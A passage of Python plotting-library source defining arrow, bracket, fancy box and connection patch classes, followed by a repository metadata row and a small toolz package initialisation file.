def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=False, endarrow=True,
fillbegin=False, fillend=True,
head_length=head_length, head_width=head_width)
@_register_style(_style_list, name="<|-|>")
class CurveFilledAB(_Curve):
"""An arrow with filled triangle heads at both ends."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=True, endarrow=True,
fillbegin=True, fillend=True,
head_length=head_length, head_width=head_width)
class _Bracket(_Base):
def __init__(self, bracketA=None, bracketB=None,
widthA=1., widthB=1.,
lengthA=0.2, lengthB=0.2,
angleA=None, angleB=None,
scaleA=None, scaleB=None):
self.bracketA, self.bracketB = bracketA, bracketB
self.widthA, self.widthB = widthA, widthB
self.lengthA, self.lengthB = lengthA, lengthB
self.angleA, self.angleB = angleA, angleB
self.scaleA, self.scaleB = scaleA, scaleB
def _get_bracket(self, x0, y0,
cos_t, sin_t, width, length):
# arrow from x0, y0 to x1, y1
from matplotlib.bezier import get_normal_points
x1, y1, x2, y2 = get_normal_points(x0, y0, cos_t, sin_t, width)
dx, dy = length * cos_t, length * sin_t
vertices_arrow = [(x1 + dx, y1 + dy),
(x1, y1),
(x2, y2),
(x2 + dx, y2 + dy)]
codes_arrow = [Path.MOVETO,
Path.LINETO,
Path.LINETO,
Path.LINETO]
return vertices_arrow, codes_arrow
def transmute(self, path, mutation_size, linewidth):
if self.scaleA is None:
scaleA = mutation_size
else:
scaleA = self.scaleA
if self.scaleB is None:
scaleB = mutation_size
else:
scaleB = self.scaleB
vertices_list, codes_list = [], []
if self.bracketA:
x0, y0 = path.vertices[0]
x1, y1 = path.vertices[1]
cos_t, sin_t = get_cos_sin(x1, y1, x0, y0)
verticesA, codesA = self._get_bracket(x0, y0, cos_t, sin_t,
self.widthA * scaleA,
self.lengthA * scaleA)
vertices_list.append(verticesA)
codes_list.append(codesA)
vertices_list.append(path.vertices)
codes_list.append(path.codes)
if self.bracketB:
x0, y0 = path.vertices[-1]
x1, y1 = path.vertices[-2]
cos_t, sin_t = get_cos_sin(x1, y1, x0, y0)
verticesB, codesB = self._get_bracket(x0, y0, cos_t, sin_t,
self.widthB * scaleB,
self.lengthB * scaleB)
vertices_list.append(verticesB)
codes_list.append(codesB)
vertices = np.concatenate(vertices_list)
codes = np.concatenate(codes_list)
p = Path(vertices, codes)
return p, False
@_register_style(_style_list, name="]-[")
class BracketAB(_Bracket):
"""An arrow with outward square brackets at both ends."""
def __init__(self,
widthA=1., lengthA=0.2, angleA=None,
widthB=1., lengthB=0.2, angleB=None):
"""
Parameters
----------
widthA : float, default: 1.0
Width of the bracket.
lengthA : float, default: 0.2
Length of the bracket.
angleA : float, default: None
Angle between the bracket and the line.
widthB : float, default: 1.0
Width of the bracket.
lengthB : float, default: 0.2
Length of the bracket.
angleB : float, default: None
Angle between the bracket and the line.
"""
super().__init__(True, True,
widthA=widthA, lengthA=lengthA, angleA=angleA,
widthB=widthB, lengthB=lengthB, angleB=angleB)
@_register_style(_style_list, name="]-")
class BracketA(_Bracket):
"""An arrow with an outward square bracket at its start."""
def __init__(self, widthA=1., lengthA=0.2, angleA=None):
"""
Parameters
----------
widthA : float, default: 1.0
Width of the bracket.
lengthA : float, default: 0.2
Length of the bracket.
angleA : float, default: None
Angle between the bracket and the line.
"""
super().__init__(True, None,
widthA=widthA, lengthA=lengthA, angleA=angleA)
@_register_style(_style_list, name="-[")
class BracketB(_Bracket):
"""An arrow with an outward square bracket at its end."""
def __init__(self, widthB=1., lengthB=0.2, angleB=None):
"""
Parameters
----------
widthB : float, default: 1.0
Width of the bracket.
lengthB : float, default: 0.2
Length of the bracket.
angleB : float, default: None
Angle between the bracket and the line.
"""
super().__init__(None, True,
widthB=widthB, lengthB=lengthB, angleB=angleB)
@_register_style(_style_list, name="|-|")
class BarAB(_Bracket):
"""An arrow with vertical bars ``|`` at both ends."""
def __init__(self,
widthA=1., angleA=None,
widthB=1., angleB=None):
"""
Parameters
----------
widthA : float, default: 1.0
Width of the bracket.
angleA : float, default: None
Angle between the bracket and the line.
widthB : float, default: 1.0
Width of the bracket.
angleB : float, default: None
Angle between the bracket and the line.
"""
super().__init__(True, True,
widthA=widthA, lengthA=0, angleA=angleA,
widthB=widthB, lengthB=0, angleB=angleB)
@_register_style(_style_list)
class Simple(_Base):
"""A simple arrow. Only works with a quadratic Bezier curve."""
def __init__(self, head_length=.5, head_width=.5, tail_width=.2):
"""
Parameters
----------
head_length : float, default: 0.5
Length of the arrow head.
head_width : float, default: 0.5
Width of the arrow head.
tail_width : float, default: 0.2
Width of the arrow tail.
"""
self.head_length, self.head_width, self.tail_width = \
head_length, head_width, tail_width
super().__init__()
def transmute(self, path, mutation_size, linewidth):
x0, y0, x1, y1, x2, y2 = self.ensure_quadratic_bezier(path)
# divide the path into a head and a tail
head_length = self.head_length * mutation_size
in_f = inside_circle(x2, y2, head_length)
arrow_path = [(x0, y0), (x1, y1), (x2, y2)]
try:
arrow_out, arrow_in = \
split_bezier_intersecting_with_closedpath(
arrow_path, in_f, tolerance=0.01)
except NonIntersectingPathException:
                # if this happens, fall back to a straight line of length
                # head_length.
x0, y0 = _point_along_a_line(x2, y2, x1, y1, head_length)
x1n, y1n = 0.5 * (x0 + x2), 0.5 * (y0 + y2)
arrow_in = [(x0, y0), (x1n, y1n), (x2, y2)]
arrow_out = None
# head
head_width = self.head_width * mutation_size
head_left, head_right = make_wedged_bezier2(arrow_in,
head_width / 2., wm=.5)
# tail
if arrow_out is not None:
tail_width = self.tail_width * mutation_size
tail_left, tail_right = get_parallels(arrow_out,
tail_width / 2.)
patch_path = [(Path.MOVETO, tail_right[0]),
(Path.CURVE3, tail_right[1]),
(Path.CURVE3, tail_right[2]),
(Path.LINETO, head_right[0]),
(Path.CURVE3, head_right[1]),
(Path.CURVE3, head_right[2]),
(Path.CURVE3, head_left[1]),
(Path.CURVE3, head_left[0]),
(Path.LINETO, tail_left[2]),
(Path.CURVE3, tail_left[1]),
(Path.CURVE3, tail_left[0]),
(Path.LINETO, tail_right[0]),
(Path.CLOSEPOLY, tail_right[0]),
]
else:
patch_path = [(Path.MOVETO, head_right[0]),
(Path.CURVE3, head_right[1]),
(Path.CURVE3, head_right[2]),
(Path.CURVE3, head_left[1]),
(Path.CURVE3, head_left[0]),
(Path.CLOSEPOLY, head_left[0]),
]
path = Path([p for c, p in patch_path], [c for c, p in patch_path])
return path, True
@_register_style(_style_list)
class Fancy(_Base):
"""A fancy arrow. Only works with a quadratic Bezier curve."""
def __init__(self, head_length=.4, head_width=.4, tail_width=.4):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.4
Width of the arrow head.
tail_width : float, default: 0.4
Width of the arrow tail.
"""
self.head_length, self.head_width, self.tail_width = \
head_length, head_width, tail_width
super().__init__()
def transmute(self, path, mutation_size, linewidth):
x0, y0, x1, y1, x2, y2 = self.ensure_quadratic_bezier(path)
# divide the path into a head and a tail
head_length = self.head_length * mutation_size
arrow_path = [(x0, y0), (x1, y1), (x2, y2)]
# path for head
in_f = inside_circle(x2, y2, head_length)
try:
path_out, path_in = split_bezier_intersecting_with_closedpath(
arrow_path, in_f, tolerance=0.01)
except NonIntersectingPathException:
                # if this happens, fall back to a straight line of length
                # head_length.
x0, y0 = _point_along_a_line(x2, y2, x1, y1, head_length)
x1n, y1n = 0.5 * (x0 + x2), 0.5 * (y0 + y2)
arrow_path = [(x0, y0), (x1n, y1n), (x2, y2)]
path_head = arrow_path
else:
path_head = path_in
            # path for tail
in_f = inside_circle(x2, y2, head_length * .8)
path_out, path_in = split_bezier_intersecting_with_closedpath(
arrow_path, in_f, tolerance=0.01)
path_tail = path_out
# head
head_width = self.head_width * mutation_size
head_l, head_r = make_wedged_bezier2(path_head,
head_width / 2.,
wm=.6)
# tail
tail_width = self.tail_width * mutation_size
tail_left, tail_right = make_wedged_bezier2(path_tail,
tail_width * .5,
w1=1., wm=0.6, w2=0.3)
            # starting point of the tail
in_f = inside_circle(x0, y0, tail_width * .3)
path_in, path_out = split_bezier_intersecting_with_closedpath(
arrow_path, in_f, tolerance=0.01)
tail_start = path_in[-1]
head_right, head_left = head_r, head_l
patch_path = [(Path.MOVETO, tail_start),
(Path.LINETO, tail_right[0]),
(Path.CURVE3, tail_right[1]),
(Path.CURVE3, tail_right[2]),
(Path.LINETO, head_right[0]),
(Path.CURVE3, head_right[1]),
(Path.CURVE3, head_right[2]),
(Path.CURVE3, head_left[1]),
(Path.CURVE3, head_left[0]),
(Path.LINETO, tail_left[2]),
(Path.CURVE3, tail_left[1]),
(Path.CURVE3, tail_left[0]),
(Path.LINETO, tail_start),
(Path.CLOSEPOLY, tail_start),
]
path = Path([p for c, p in patch_path], [c for c, p in patch_path])
return path, True
@_register_style(_style_list)
class Wedge(_Base):
"""
        Wedge shape. Only works with a quadratic Bezier curve. The
begin point has a width of the tail_width and the end point has a
width of 0. At the middle, the width is shrink_factor*tail_width.
"""
def __init__(self, tail_width=.3, shrink_factor=0.5):
"""
Parameters
----------
tail_width : float, default: 0.3
Width of the tail.
shrink_factor : float, default: 0.5
Fraction of the arrow width at the middle point.
"""
self.tail_width = tail_width
self.shrink_factor = shrink_factor
super().__init__()
def transmute(self, path, mutation_size, linewidth):
x0, y0, x1, y1, x2, y2 = self.ensure_quadratic_bezier(path)
arrow_path = [(x0, y0), (x1, y1), (x2, y2)]
b_plus, b_minus = make_wedged_bezier2(
arrow_path,
self.tail_width * mutation_size / 2.,
wm=self.shrink_factor)
patch_path = [(Path.MOVETO, b_plus[0]),
(Path.CURVE3, b_plus[1]),
(Path.CURVE3, b_plus[2]),
(Path.LINETO, b_minus[2]),
(Path.CURVE3, b_minus[1]),
(Path.CURVE3, b_minus[0]),
(Path.CLOSEPOLY, b_minus[0]),
]
path = Path([p for c, p in patch_path], [c for c, p in patch_path])
return path, True
docstring.interpd.update(
AvailableBoxstyles=BoxStyle.pprint_styles(),
ListBoxstyles=_simpleprint_styles(BoxStyle._style_list),
AvailableArrowstyles=ArrowStyle.pprint_styles(),
AvailableConnectorstyles=ConnectionStyle.pprint_styles(),
)
docstring.dedent_interpd(BoxStyle)
docstring.dedent_interpd(ArrowStyle)
docstring.dedent_interpd(ConnectionStyle)
class FancyBboxPatch(Patch):
"""
A fancy box around a rectangle with lower left at *xy* = (*x*, *y*)
with specified width and height.
`.FancyBboxPatch` is similar to `.Rectangle`, but it draws a fancy box
around the rectangle. The transformation of the rectangle box to the
fancy box is delegated to the style classes defined in `.BoxStyle`.
"""
_edge_default = True
def __str__(self):
s = self.__class__.__name__ + "((%g, %g), width=%g, height=%g)"
return s % (self._x, self._y, self._width, self._height)
@docstring.dedent_interpd
def __init__(self, xy, width, height,
boxstyle="round",
bbox_transmuter=None,
mutation_scale=1.,
mutation_aspect=None,
**kwargs):
"""
Parameters
----------
xy : float, float
The lower left corner of the box.
width : float
The width of the box.
height : float
The height of the box.
boxstyle : str or `matplotlib.patches.BoxStyle`
The style of the fancy box. This can either be a `.BoxStyle`
instance or a string of the style name and optionally comma
            separated attributes (e.g. "Round, pad=0.2"). This string is
passed to `.BoxStyle` to construct a `.BoxStyle` object. See
there for a full documentation.
The following box styles are available:
%(AvailableBoxstyles)s
mutation_scale : float, default: 1
Scaling factor applied to the attributes of the box style
(e.g. pad or rounding_size).
mutation_aspect : float, optional
The height of the rectangle will be squeezed by this value before
the mutation and the mutated box will be stretched by the inverse
of it. For example, this allows different horizontal and vertical
padding.
Other Parameters
----------------
**kwargs : `.Patch` properties
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self._x = xy[0]
self._y = xy[1]
self._width = width
self._height = height
if boxstyle == "custom":
if bbox_transmuter is None:
raise ValueError("bbox_transmuter argument is needed with "
"custom boxstyle")
self._bbox_transmuter = bbox_transmuter
else:
self.set_boxstyle(boxstyle)
self._mutation_scale = mutation_scale
self._mutation_aspect = mutation_aspect
self.stale = True
@docstring.dedent_interpd
def set_boxstyle(self, boxstyle=None, **kwargs):
"""
Set the box style.
Most box styles can be further configured using attributes.
Attributes from the previous box style are not reused.
Without argument (or with ``boxstyle=None``), the available box styles
are returned as a human-readable string.
Parameters
----------
boxstyle : str
The name of the box style. Optionally, followed by a comma and a
comma-separated list of attributes. The attributes may
alternatively be passed separately as keyword arguments.
The following box styles are available:
%(AvailableBoxstyles)s
.. ACCEPTS: %(ListBoxstyles)s
**kwargs
Additional attributes for the box style. See the table above for
supported parameters.
Examples
--------
::
set_boxstyle("round,pad=0.2")
set_boxstyle("round", pad=0.2)
"""
if boxstyle is None:
return BoxStyle.pprint_styles()
if isinstance(boxstyle, BoxStyle._Base) or callable(boxstyle):
self._bbox_transmuter = boxstyle
else:
self._bbox_transmuter = BoxStyle(boxstyle, **kwargs)
self.stale = True
def set_mutation_scale(self, scale):
"""
Set the mutation scale.
Parameters
----------
scale : float
"""
self._mutation_scale = scale
self.stale = True
def get_mutation_scale(self):
"""Return the mutation scale."""
return self._mutation_scale
def set_mutation_aspect(self, aspect):
"""
Set the aspect ratio of the bbox mutation.
Parameters
----------
aspect : float
"""
self._mutation_aspect = aspect
self.stale = True
def get_mutation_aspect(self):
"""Return the aspect ratio of the bbox mutation."""
return self._mutation_aspect
def get_boxstyle(self):
"""Return the boxstyle object."""
return self._bbox_transmuter
def get_path(self):
"""Return the mutated path of the rectangle."""
_path = self.get_boxstyle()(self._x, self._y,
self._width, self._height,
self.get_mutation_scale(),
self.get_mutation_aspect())
return _path
# Following methods are borrowed from the Rectangle class.
def get_x(self):
"""Return the left coord of the rectangle."""
return self._x
def get_y(self):
"""Return the bottom coord of the rectangle."""
return self._y
def get_width(self):
"""Return the width of the rectangle."""
return self._width
def get_height(self):
"""Return the height of the rectangle."""
return self._height
def set_x(self, x):
"""
Set the left coord of the rectangle.
Parameters
----------
x : float
"""
self._x = x
self.stale = True
def set_y(self, y):
"""
Set the bottom coord of the rectangle.
Parameters
----------
y : float
"""
self._y = y
self.stale = True
def set_width(self, w):
"""
Set the rectangle width.
Parameters
----------
w : float
"""
self._width = w
self.stale = True
def set_height(self, h):
"""
Set the rectangle height.
Parameters
----------
h : float
"""
self._height = h
self.stale = True
def set_bounds(self, *args):
"""
Set the bounds of the rectangle.
Call signatures::
set_bounds(left, bottom, width, height)
set_bounds((left, bottom, width, height))
Parameters
----------
left, bottom : float
The coordinates of the bottom left corner of the rectangle.
width, height : float
The width/height of the rectangle.
"""
if len(args) == 1:
l, b, w, h = args[0]
else:
l, b, w, h = args
self._x = l
self._y = b
self._width = w
self._height = h
self.stale = True
def get_bbox(self):
"""Return the `.Bbox`."""
return transforms.Bbox.from_bounds(self._x, self._y,
self._width, self._height)
class FancyArrowPatch(Patch):
"""
A fancy arrow patch. It draws an arrow using the `ArrowStyle`.
The head and tail positions are fixed at the specified start and end points
of the arrow, but the size and shape (in display coordinates) of the arrow
    do not change when the axes are moved or zoomed.
"""
_edge_default = True
def __str__(self):
if self._posA_posB is not None:
(x1, y1), (x2, y2) = self._posA_posB
return f"{type(self).__name__}(({x1:g}, {y1:g})->({x2:g}, {y2:g}))"
else:
return f"{type(self).__name__}({self._path_original})"
@docstring.dedent_interpd
def __init__(self, posA=None, posB=None,
path=None,
arrowstyle="simple",
connectionstyle="arc3",
patchA=None,
patchB=None,
shrinkA=2,
shrinkB=2,
mutation_scale=1,
mutation_aspect=None,
dpi_cor=1,
**kwargs):
"""
There are two ways for defining an arrow:
- If *posA* and *posB* are given, a path connecting two points is
created according to *connectionstyle*. The path will be
clipped with *patchA* and *patchB* and further shrunken by
*shrinkA* and *shrinkB*. An arrow is drawn along this
resulting path using the *arrowstyle* parameter.
- Alternatively if *path* is provided, an arrow is drawn along this
path and *patchA*, *patchB*, *shrinkA*, and *shrinkB* are ignored.
Parameters
----------
posA, posB : (float, float), default: None
(x, y) coordinates of arrow tail and arrow head respectively.
path : `~matplotlib.path.Path`, default: None
If provided, an arrow is drawn along this path and *patchA*,
*patchB*, *shrinkA*, and *shrinkB* are ignored.
arrowstyle : str or `.ArrowStyle`, default: 'simple'
The `.ArrowStyle` with which the fancy arrow is drawn. If a
string, it should be one of the available arrowstyle names, with
optional comma-separated attributes. The optional attributes are
meant to be scaled with the *mutation_scale*. The following arrow
styles are available:
%(AvailableArrowstyles)s
connectionstyle : str or `.ConnectionStyle` or None, optional, \
default: 'arc3'
The `.ConnectionStyle` with which *posA* and *posB* are connected.
If a string, it should be one of the available connectionstyle
names, with optional comma-separated attributes. The following
connection styles are available:
%(AvailableConnectorstyles)s
patchA, patchB : `.Patch`, default: None
Head and tail patches, respectively.
shrinkA, shrinkB : float, default: 2
Shrinking factor of the tail and head of the arrow respectively.
mutation_scale : float, default: 1
Value with which attributes of *arrowstyle* (e.g., *head_length*)
will be scaled.
mutation_aspect : None or float, default: None
The height of the rectangle will be squeezed by this value before
the mutation and the mutated box will be stretched by the inverse
of it.
dpi_cor : float, default: 1
dpi_cor is currently used for linewidth-related things and shrink
factor. Mutation scale is affected by this.
Other Parameters
----------------
**kwargs : `.Patch` properties, optional
Here is a list of available `.Patch` properties:
%(Patch)s
In contrast to other patches, the default ``capstyle`` and
``joinstyle`` for `FancyArrowPatch` are set to ``"round"``.
"""
# Traditionally, the cap- and joinstyle for FancyArrowPatch are round
kwargs.setdefault("joinstyle", "round")
kwargs.setdefault("capstyle", "round")
Patch.__init__(self, **kwargs)
if posA is not None and posB is not None and path is None:
self._posA_posB = [posA, posB]
if connectionstyle is None:
connectionstyle = "arc3"
self.set_connectionstyle(connectionstyle)
elif posA is None and posB is None and path is not None:
self._posA_posB = None
else:
raise ValueError("Either posA and posB, or path need to provided")
self.patchA = patchA
self.patchB = patchB
self.shrinkA = shrinkA
self.shrinkB = shrinkB
self._path_original = path
self.set_arrowstyle(arrowstyle)
self._mutation_scale = mutation_scale
self._mutation_aspect = mutation_aspect
self.set_dpi_cor(dpi_cor)
def set_dpi_cor(self, dpi_cor):
"""
dpi_cor is currently used for linewidth-related things and
shrink factor. Mutation scale is affected by this.
Parameters
----------
dpi_cor : float
"""
self._dpi_cor = dpi_cor
self.stale = True
def get_dpi_cor(self):
"""
dpi_cor is currently used for linewidth-related things and
shrink factor. Mutation scale is affected by this.
Returns
-------
scalar
"""
return self._dpi_cor
def set_positions(self, posA, posB):
"""
Set the begin and end positions of the connecting path.
Parameters
----------
posA, posB : None, tuple
(x, y) coordinates of arrow tail and arrow head respectively. If
`None` use current value.
"""
if posA is not None:
self._posA_posB[0] = posA
if posB is not None:
self._posA_posB[1] = posB
self.stale = True
def set_patchA(self, patchA):
"""
Set the tail patch.
Parameters
----------
patchA : `.patches.Patch`
"""
self.patchA = patchA
self.stale = True
def set_patchB(self, patchB):
"""
Set the head patch.
Parameters
----------
patchB : `.patches.Patch`
"""
self.patchB = patchB
self.stale = True
def set_connectionstyle(self, connectionstyle, **kw):
"""
Set the connection style. Old attributes are forgotten.
Parameters
----------
connectionstyle : str or `.ConnectionStyle` or None, optional
Can be a string with connectionstyle name with
optional comma-separated attributes, e.g.::
set_connectionstyle("arc,angleA=0,armA=30,rad=10")
Alternatively, the attributes can be provided as keywords, e.g.::
set_connectionstyle("arc", angleA=0,armA=30,rad=10)
Without any arguments (or with ``connectionstyle=None``), return
available styles as a list of strings.
"""
if connectionstyle is None:
return ConnectionStyle.pprint_styles()
if (isinstance(connectionstyle, ConnectionStyle._Base) or
callable(connectionstyle)):
self._connector = connectionstyle
else:
self._connector = ConnectionStyle(connectionstyle, **kw)
self.stale = True
def get_connectionstyle(self):
"""Return the `ConnectionStyle` used."""
return self._connector
def set_arrowstyle(self, arrowstyle=None, **kw):
"""
        Set the arrow style. Old attributes are forgotten. Without arguments
        (or with ``arrowstyle=None``) this returns the available arrow styles
        as a list of strings.
Parameters
----------
arrowstyle : None or ArrowStyle or str, default: None
Can be a string with arrowstyle name with optional comma-separated
attributes, e.g.::
set_arrowstyle("Fancy,head_length=0.2")
Alternatively attributes can be provided as keywords, e.g.::
set_arrowstyle("fancy", head_length=0.2)
"""
if arrowstyle is None:
return ArrowStyle.pprint_styles()
if isinstance(arrowstyle, ArrowStyle._Base):
self._arrow_transmuter = arrowstyle
else:
self._arrow_transmuter = ArrowStyle(arrowstyle, **kw)
self.stale = True
def get_arrowstyle(self):
"""Return the arrowstyle object."""
return self._arrow_transmuter
def set_mutation_scale(self, scale):
"""
Set the mutation scale.
Parameters
----------
scale : float
"""
self._mutation_scale = scale
self.stale = True
def get_mutation_scale(self):
"""
Return the mutation scale.
Returns
-------
scalar
"""
return self._mutation_scale
def set_mutation_aspect(self, aspect):
"""
Set the aspect ratio of the bbox mutation.
Parameters
----------
aspect : float
"""
self._mutation_aspect = aspect
self.stale = True
def get_mutation_aspect(self):
"""Return the aspect ratio of the bbox mutation."""
return self._mutation_aspect
def get_path(self):
"""
Return the path of the arrow in the data coordinates. Use
get_path_in_displaycoord() method to retrieve the arrow path
in display coordinates.
"""
_path, fillable = self.get_path_in_displaycoord()
if np.iterable(fillable):
_path = Path.make_compound_path(*_path)
return self.get_transform().inverted().transform_path(_path)
def get_path_in_displaycoord(self):
"""Return the mutated path of the arrow in display coordinates."""
dpi_cor = self.get_dpi_cor()
if self._posA_posB is not None:
posA = self._convert_xy_units(self._posA_posB[0])
posB = self._convert_xy_units(self._posA_posB[1])
(posA, posB) = self.get_transform().transform((posA, posB))
_path = self.get_connectionstyle()(posA, posB,
patchA=self.patchA,
patchB=self.patchB,
shrinkA=self.shrinkA * dpi_cor,
shrinkB=self.shrinkB * dpi_cor
)
else:
_path = self.get_transform().transform_path(self._path_original)
_path, fillable = self.get_arrowstyle()(
_path,
self.get_mutation_scale() * dpi_cor,
self.get_linewidth() * dpi_cor,
self.get_mutation_aspect())
# if not fillable:
# self._fill = False
return _path, fillable
def draw(self, renderer):
if not self.get_visible():
return
with self._bind_draw_path_function(renderer) as draw_path:
# FIXME : dpi_cor is for the dpi-dependency of the linewidth. There
# could be room for improvement.
self.set_dpi_cor(renderer.points_to_pixels(1.))
path, fillable = self.get_path_in_displaycoord()
if not np.iterable(fillable):
path = [path]
fillable = [fillable]
affine = transforms.IdentityTransform()
for p, f in zip(path, fillable):
draw_path(
p, affine,
self._facecolor if f and self._facecolor[3] else None)
class ConnectionPatch(FancyArrowPatch):
"""A patch that connects two points (possibly in different axes)."""
def __str__(self):
return "ConnectionPatch((%g, %g), (%g, %g))" % \
(self.xy1[0], self.xy1[1], self.xy2[0], self.xy2[1])
@docstring.dedent_interpd
def __init__(self, xyA, xyB, coordsA, coordsB=None,
axesA=None, axesB=None,
arrowstyle="-",
connectionstyle="arc3",
patchA=None,
patchB=None,
shrinkA=0.,
shrinkB=0.,
mutation_scale=10.,
mutation_aspect=None,
clip_on=False,
dpi_cor=1.,
**kwargs):
"""
Connect point *xyA* in *coordsA* with point *xyB* in *coordsB*.
Valid keys are
=============== ======================================================
Key Description
=============== ======================================================
arrowstyle the arrow style
connectionstyle the connection style
relpos default is (0.5, 0.5)
patchA default is bounding box of the text
patchB default is None
shrinkA default is 2 points
shrinkB default is 2 points
mutation_scale default is text size (in points)
mutation_aspect default is 1.
? any key for `matplotlib.patches.PathPatch`
=============== ======================================================
*coordsA* and *coordsB* are strings that indicate the
coordinates of *xyA* and *xyB*.
================= ===================================================
Property Description
================= ===================================================
'figure points' points from the lower left corner of the figure
'figure pixels' pixels from the lower left corner of the figure
'figure fraction' 0, 0 is lower left of figure and 1, 1 is upper right
'axes points' points from lower left corner of axes
'axes pixels' pixels from lower left corner of axes
'axes fraction' 0, 0 is lower left of axes and 1, 1 is upper right
'data' use the coordinate system of the object being
annotated (default)
'offset points' offset (in points) from the *xy* value
'polar' you can specify *theta*, *r* for the annotation,
even in cartesian plots. Note that if you are using
a polar axes, you do not need to specify polar for
the coordinate system since that is the native
"data" coordinate system.
================= ===================================================
Alternatively they can be set to any valid
`~matplotlib.transforms.Transform`.
.. note::
Using `ConnectionPatch` across two `~.axes.Axes` instances
is not directly compatible with :doc:`constrained layout
</tutorials/intermediate/constrainedlayout_guide>`. Add the artist
directly to the `.Figure` instead of adding it to a specific Axes.
.. code-block:: default
fig, ax = plt.subplots(1, 2, constrained_layout=True)
con = ConnectionPatch(..., axesA=ax[0], axesB=ax[1])
fig.add_artist(con)
"""
if coordsB is None:
coordsB = coordsA
# we'll draw ourself after the artist we annotate by default
self.xy1 = xyA
self.xy2 = xyB
self.coords1 = coordsA
self.coords2 = coordsB
self.axesA = axesA
self.axesB = axesB
FancyArrowPatch.__init__(self,
posA=(0, 0), posB=(1, 1),
arrowstyle=arrowstyle,
connectionstyle=connectionstyle,
patchA=patchA,
patchB=patchB,
shrinkA=shrinkA,
shrinkB=shrinkB,
mutation_scale=mutation_scale,
mutation_aspect=mutation_aspect,
clip_on=clip_on,
dpi_cor=dpi_cor,
**kwargs)
# if True, draw annotation only if self.xy is inside the axes
self._annotation_clip = None
def _get_xy(self, xy, s, axes=None):
"""Calculate the pixel position of given point."""
s0 = s # For the error message, if needed.
if axes is None:
axes = self.axes
xy = np.array(xy)
if s in ["figure points", "axes points"]:
xy *= self.figure.dpi / 72
s = s.replace("points", "pixels")
elif s == "figure fraction":
s = self.figure.transFigure
elif s == "axes fraction":
s = axes.transAxes
x, y = xy
if s == 'data':
trans = axes.transData
x = float(self.convert_xunits(x))
y = float(self.convert_yunits(y))
return trans.transform((x, y))
elif s == 'offset points':
if self.xycoords == 'offset points': # prevent recursion
return self._get_xy(self.xy, 'data')
return (
self._get_xy(self.xy, self.xycoords) # converted data point
+ xy * self.figure.dpi / 72) # converted offset
elif s == 'polar':
theta, r = x, y
x = r * np.cos(theta)
y = r * np.sin(theta)
trans = axes.transData
return trans.transform((x, y))
elif s == 'figure pixels':
# pixels from the lower left corner of the figure
bb = self.figure.bbox
x = bb.x0 + x if x >= 0 else bb.x1 + x
y = bb.y0 + y if y >= 0 else bb.y1 + y
return x, y
elif s == 'axes pixels':
# pixels from the lower left corner of the axes
bb = axes.bbox
x = bb.x0 + x if x >= 0 else bb.x1 + x
y = bb.y0 + y if y >= 0 else bb.y1 + y
return x, y
elif isinstance(s, transforms.Transform):
return s.transform(xy)
else:
raise ValueError(f"{s0} is not a valid coordinate transformation")
def set_annotation_clip(self, b):
"""
Set the clipping behavior.
Parameters
----------
b : bool or None
- *False*: The annotation will always be drawn regardless of its
position.
- *True*: The annotation will only be drawn if ``self.xy`` is
inside the axes.
- *None*: The annotation will only be drawn if ``self.xy`` is
inside the axes and ``self.xycoords == "data"``.
"""
self._annotation_clip = b
self.stale = True
def get_annotation_clip(self):
"""
Return the clipping behavior.
See `.set_annotation_clip` for the meaning of the return value.
"""
return self._annotation_clip
def get_path_in_displaycoord(self):
"""Return the mutated path of the arrow in display coordinates."""
dpi_cor = self.get_dpi_cor()
posA = self._get_xy(self.xy1, self.coords1, self.axesA)
posB = self._get_xy(self.xy2, self.coords2, self.axesB)
path = self.get_connectionstyle()(
posA, posB,
patchA=self.patchA, patchB=self.patchB,
shrinkA=self.shrinkA * dpi_cor, shrinkB=self.shrinkB * dpi_cor,
)
path, fillable = self.get_arrowstyle()(
path,
self.get_mutation_scale() * dpi_cor,
self.get_linewidth() * dpi_cor,
self.get_mutation_aspect()
)
return path, fillable
def _check_xy(self, renderer):
"""Check whether the annotation needs to be drawn."""
b = self.get_annotation_clip()
if b or (b is None and self.coords1 == "data"):
xy_pixel = self._get_xy(self.xy1, self.coords1, self.axesA)
if self.axesA is None:
axes = self.axes
else:
axes = self.axesA
if not axes.contains_point(xy_pixel):
return False
if b or (b is None and self.coords2 == "data"):
xy_pixel = self._get_xy(self.xy2, self.coords2, self.axesB)
if self.axesB is None:
axes = self.axes
else:
axes = self.axesB
if not axes.contains_point(xy_pixel):
return False
return True
def draw(self, renderer):
if renderer is not None:
self._renderer = renderer
if not self.get_visible() or not self._check_xy(renderer):
return
FancyArrowPatch.draw(self, renderer)
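# --- Added illustration (not part of the original module) ---
# Minimal sketch of ConnectionPatch across two Axes, following the class
# docstring above; figure/axes names here are assumptions for illustration.
#
#     import matplotlib.pyplot as plt
#     fig, (ax1, ax2) = plt.subplots(1, 2, constrained_layout=True)
#     xy = (0.3, 0.2)
#     con = ConnectionPatch(xyA=xy, coordsA=ax1.transData,
#                           xyB=xy, coordsB=ax2.transData,
#                           arrowstyle="->", shrinkB=5)
#     fig.add_artist(con)  # add to the Figure, as the docstring advises
#     plt.show()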
| [
"[email protected]"
]
| |
1522254803b17907540e7f62b7738bd022e97f1f | ce083128fa87ca86c65059893aa8882d088461f5 | /python/sistema-de-contatos/.venv/lib/python2.7/site-packages/toolz/__init__.py | 43226df7316aa0545101101540d51ff04f94c368 | []
| no_license | marcosptf/fedora | 581a446e7f81d8ae9a260eafb92814bc486ee077 | 359db63ff1fa79696b7bc803bcfa0042bff8ab44 | refs/heads/master | 2023-04-06T14:53:40.378260 | 2023-03-26T00:47:52 | 2023-03-26T00:47:52 | 26,059,824 | 6 | 5 | null | 2022-12-08T00:43:21 | 2014-11-01T18:48:56 | null | UTF-8 | Python | false | false | 314 | py | from .itertoolz import *
from .functoolz import *
from .dicttoolz import *
from .recipes import *
from .compatibility import map, filter
from . import sandbox
from functools import partial, reduce
sorted = sorted
# Aliases
comp = compose
functoolz._sigs.create_signature_registry()
__version__ = '0.8.0'
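# --- Added illustration (not part of the original file) ---
# Sketch of the aliases re-exported above; kept commented so importing the
# package stays side-effect free:
#
#     from toolz import comp
#     inc = lambda x: x + 1
#     double = lambda x: x * 2
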